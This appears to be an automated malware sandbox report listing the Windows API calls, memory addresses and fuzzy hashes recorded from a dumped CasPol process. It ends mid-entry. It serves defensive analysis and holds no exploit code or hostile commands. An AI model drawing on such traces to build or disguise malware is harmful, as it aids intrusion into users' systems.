                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                          APIs
                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Open
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
